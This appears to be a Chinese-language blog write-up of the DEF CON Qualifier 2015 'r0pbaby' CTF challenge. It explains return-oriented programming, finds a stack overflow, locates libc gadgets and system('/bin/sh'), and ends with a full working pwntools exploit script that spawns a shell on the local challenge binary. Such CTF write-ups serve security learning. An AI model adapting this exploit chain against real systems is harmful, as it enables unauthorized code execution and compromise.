<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn,">










<meta name="description" content="学习一波经典的ROP题目。 题目地址：https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/babys-first/r0pbaby">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="ROP_r0pbaby">
<meta property="og:url" content="https://hc1024.github.io/2019/09/25/ROP-r0pbaby/index.html">
<meta property="og:site_name" content="HC1024">
<meta property="og:description" content="学习一波经典的ROP题目。 题目地址：https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/babys-first/r0pbaby">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://i.loli.net/2019/09/25/W7DT6KqYjOziJAX.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/9EFqd42y5zAiNUe.jpg">
<meta property="og:image" content="https://i.loli.net/2019/09/25/Y9TX5HQ6rAqeCWl.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/XNL3GmTUg8Exqjf.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/ipmGdBItCvqrW8P.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/FbylUpD8Itwn6oM.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/3dwnQf1E4e8ltgy.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/Q6DPaOCAoLXgMnt.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/XKISZ7tq3u1cW2j.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/YOpX5HcTKh6tnau.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/Amvo4REBFTVzp9S.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/wQFjL2fOEMXCJTl.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/VLRNJSbkdmz7u49.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/6VRyaCZfKIhJ2wb.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/JIp9NdfwLaWmo1X.png">
<meta property="og:image" content="https://i.loli.net/2019/09/25/fQmon54hdUajYV3.png">
<meta property="og:updated_time" content="2019-09-24T18:49:22.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ROP_r0pbaby">
<meta name="twitter:description" content="学习一波经典的ROP题目。 题目地址：https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/babys-first/r0pbaby">
<meta name="twitter:image" content="https://i.loli.net/2019/09/25/W7DT6KqYjOziJAX.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://hc1024.github.io/2019/09/25/ROP-r0pbaby/">





  <title>ROP_r0pbaby | HC1024</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">HC1024</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br>
            
            Commonweal 404
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://hc1024.github.io/2019/09/25/ROP-r0pbaby/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="HC">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="HC1024">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">ROP_r0pbaby</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-09-25T01:20:11+08:00">
                2019-09-25
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  1.2k 
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  4
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>学习一波经典的ROP题目。</p>
<p>题目地址：<a href="https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/babys-first/r0pbaby" target="_blank" rel="noopener">https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/babys-first/r0pbaby</a></p>
<a id="more"></a>

<p><img src="https://i.loli.net/2019/09/25/W7DT6KqYjOziJAX.png" alt="1.png"></p>
<p>64位的程序</p>
<p>查看保护：</p>
<p><img src="https://i.loli.net/2019/09/25/9EFqd42y5zAiNUe.jpg" alt="2.jpg"></p>
<p>开启了NX（不可执行）+PIE（Position Independnet Code位置无关代码）等安全防护，对于这样的保护机制，绕过的方法是ROP(Return-oriented Programming)，那ROP是什么？</p>
<p>ROP的核心思想：攻击者扫描已有的<a href="https://baike.baidu.com/item/动态链接库/100352" target="_blank" rel="noopener">动态链接库</a>和可执行文件，提取出可以利用的指令片段(gadget)，这些指令片段均以ret指令结尾，即用ret指令实现指令片段执行流的衔接。</p>
<p>（往后做的时候遇到一个问题，看别的大佬的wp，有说要关闭ASLR的，把关不关ASLR分成了两种解法，我自己本地试的时候，发现我关了ASLR也没用，exp根本跑不起来，所以我就按有ASLR的解法来了。）</p>
<p>玩一玩这个程序：</p>
<p><img src="https://i.loli.net/2019/09/25/Y9TX5HQ6rAqeCWl.png" alt="3.png"></p>
<p>第一选项打印libc地址</p>
<p>第二个选项打印system函数地址</p>
<p>第三个是向栈写数据</p>
<p>用ida看一下</p>
<p><img src="https://i.loli.net/2019/09/25/XNL3GmTUg8Exqjf.png" alt="4.png"></p>
<p><img src="https://i.loli.net/2019/09/25/ipmGdBItCvqrW8P.png" alt="5.png"></p>
<p>发现危险函数memcpy()，说明存在栈溢出漏洞。</p>
<p>接下来用gdb调试一下：</p>
<p><img src="https://i.loli.net/2019/09/25/FbylUpD8Itwn6oM.png" alt="6.png"></p>
<p><img src="https://i.loli.net/2019/09/25/3dwnQf1E4e8ltgy.png" alt="7.png"></p>
<p><img src="https://i.loli.net/2019/09/25/Q6DPaOCAoLXgMnt.png" alt="8.png"></p>
<p>看到程序在0x0000555555554eb3崩溃</p>
<p><img src="https://i.loli.net/2019/09/25/XKISZ7tq3u1cW2j.png" alt="9.png"></p>
<p>此时rsp中的值是ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA，来计算一下偏移量:</p>
<p><img src="https://i.loli.net/2019/09/25/YOpX5HcTKh6tnau.png" alt="10.png"></p>
<p>所以，ret的地址是以我们输入的偏移量为8的位置来取的。我们这样就可以控制rip了。</p>
<p>现在来想一下我们该干什么。我们的希望获取一个shell，也就是说要控制程序执行流程，最好能跳转执行system函数。</p>
<p>所以我们需要构造一个payload让程序执行system(“/bin/sh”)</p>
<p>接下来我们要做的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">找到&quot;/bin/sh&quot;位置</span><br><span class="line">找到&quot;system函数地址&quot;</span><br><span class="line">寻找合适的gadget，让程序流连接起来</span><br></pre></td></tr></table></figure>

<p><strong>寻找gadget</strong>：</p>
<p>我们要跳转执行的地方，要有两个pop和一个call。先来复习一下64位架构下各寄存器的作用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">%rax 作为函数返回值使用。</span><br><span class="line">%rsp 栈指针寄存器，指向栈顶</span><br><span class="line">%rdi，%rsi，%rdx，%rcx，%r8，%r9 用作函数参数，依次对应第1参数，第2参数。。。</span><br><span class="line">%rbx，%rbp，%r12，%r13，%14，%15 用作数据存储，遵循被调用者使用规则，简单说就是随便用，调用子函数之前要备份它，以防他被修改</span><br><span class="line">%r10，%r11 用作数据存储，遵循调用者使用规则，简单说就是使用之前要先保存原值</span><br></pre></td></tr></table></figure>

<p>rdi是传第一个参数的，那么我们要寻找的gadget至少有一个pop  rdi，我们可以用ida在libc中来找：</p>
<p>我们使用的libc是：libc-2.27.so</p>
<p><img src="https://i.loli.net/2019/09/25/Amvo4REBFTVzp9S.png" alt="11.png"></p>
<p><img src="https://i.loli.net/2019/09/25/wQFjL2fOEMXCJTl.png" alt="12.png"></p>
<p>找到了符合的。</p>
<p><strong>寻找”/bin/sh”:</strong></p>
<p>用ida ：</p>
<p>用ida打开libc-2.27.so，shift + f12 ,ctrl + f 搜索”/bin/sh’</p>
<p><img src="https://i.loli.net/2019/09/25/VLRNJSbkdmz7u49.png" alt="13.png"></p>
<p>或：</p>
<p><img src="https://i.loli.net/2019/09/25/6VRyaCZfKIhJ2wb.png" alt="14.png"></p>
<p>区别在于ida找到的是程序未加载到内存时的地址，第二种方法找到的是在内存中的地址。如果开启了ASLR，还是用ida吧。</p>
<p><strong>寻找system：</strong></p>
<p>ida打开libc-2.27.so，搜索字符串”system”</p>
<p><img src="https://i.loli.net/2019/09/25/JIp9NdfwLaWmo1X.png" alt="15.png"></p>
<p><strong>构造payload：</strong></p>
<p>“A”*8 + p64(ppc) + p64(sys_addr) + p64(binsh_addr) </p>
<p>关于这个顺序，我的理解是，因为我们找到的gadget的是先pop rax，再pop rdi，也就是说，当程序跳转到这一块时，先要执行pop rax，又因为rax用来传递函数地址，而且后面还要call rax，那接下来跟的就只能是system函数的地址，pop rdi，就把”/bin/sh”用rdi传过去。</p>
<p>好了，到这里我们粗略的完成了payload的构造，接下来要考虑的具体一点。</p>
<p>我们默认是开启了ASLR保护的，程序运行后，我们上面找到的地址就发生变化了，那么程序运行我们如何定位我们需要的地址呢？</p>
<p>我们知道在程序未加载到内存中时，system在libc中的地址，我们也知道ppc和binsh在libc中的地址，那么就通过计算它们相对于libc_system的偏移，加载到内存中后就可以表示成system运行后的地址+偏移了。而system函数运行后的地址可以通过程序第二个选项来获得。</p>
<p><strong>编写exp:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">sh = process(&apos;./r0pbaby&apos;)</span><br><span class="line">def get_system_addr():</span><br><span class="line">    sh.recvuntil(&apos;: &apos;)</span><br><span class="line">    sh.sendline(&apos;2&apos;)</span><br><span class="line">    sh.recv()</span><br><span class="line">    sh.sendline(&apos;system&apos;)</span><br><span class="line">    addr = sh.recvline().split(&apos;0x&apos;)[1].split(&apos;\n&apos;)[0]</span><br><span class="line">    return addr</span><br><span class="line">    </span><br><span class="line">def send_paylaod(sys_addr,binsh_off,ppc_off):</span><br><span class="line">    payload = &apos;A&apos; * 8 + p64(sys_addr + ppc_off) + p64(sys_addr) + p64(sys_addr + binsh_off)</span><br><span class="line">    sh.recv()</span><br><span class="line">    sh.sendline(&apos;3&apos;)</span><br><span class="line">    sh.recv()</span><br><span class="line">    sh.sendline(str(len(payload)))</span><br><span class="line">    sh.sendline(payload)</span><br><span class="line">    return</span><br><span class="line"></span><br><span class="line">def main():</span><br><span class="line">    sys_addr = int(get_system_addr(),16)</span><br><span class="line">    #print sys_addr</span><br><span class="line">    libc_sys_addr = 0x4F440</span><br><span class="line">    libc_binsh_addr = 0x1B3E9A</span><br><span class="line">    libc_ppc_addr = 0x12188B</span><br><span class="line">    binsh_off = libc_binsh_addr - libc_sys_addr</span><br><span class="line">    ppc_off = libc_ppc_addr - libc_sys_addr</span><br><span class="line">    send_paylaod(sys_addr,binsh_off,ppc_off)</span><br><span class="line">    sh.recv()</span><br><span class="line">    sh.interactive()</span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2019/09/25/fQmon54hdUajYV3.png" alt="16.png"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/12/hello-world/" rel="next" title="hello world">
                <i class="fa fa-chevron-left"></i> hello world
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/16/b0verfl0w-X-CTF-Quals-2016/" rel="prev" title="b0verfl0w_X-CTF Quals 2016">
                b0verfl0w_X-CTF Quals 2016 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="HC">
            
              <p class="site-author-name" itemprop="name">HC</p>
              <p class="site-description motion-element" itemprop="description">一位网安专业的大二小白。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/r3t7rn/" title="r3t7rn" target="_blank">r3t7rn</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.cnblogs.com/LapterGrsd" title="LapterGrsd" target="_blank">LapterGrsd</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://leeeddin.github.io/" title="le3d1ng" target="_blank">le3d1ng</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.yodidi.cn/" title="小熊" target="_blank">小熊</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://thriumph.top/" title="Thriumph" target="_blank">Thriumph</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">HC</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>



<br>
<span id="timeDate">载入天数...</span>
<span id="times">载入时分秒...</span><br>  Sometimes your whole life boils down to one insane move.
<script>
    var now = new Date(); 
    function createtime() { 
        var grt= new Date("09/12/2019 00:00:00");//此处修改你的建站时间或者网站上线时间 
        now.setTime(now.getTime()+250); 
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days); 
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours); 
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum); 
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;} 
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum); 
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;} 
        document.getElementById("timeDate").innerHTML = "已修炼 "+dnum+" 天 "; 
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒"; 
    } 
setInterval("createtime()",250);
</script>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
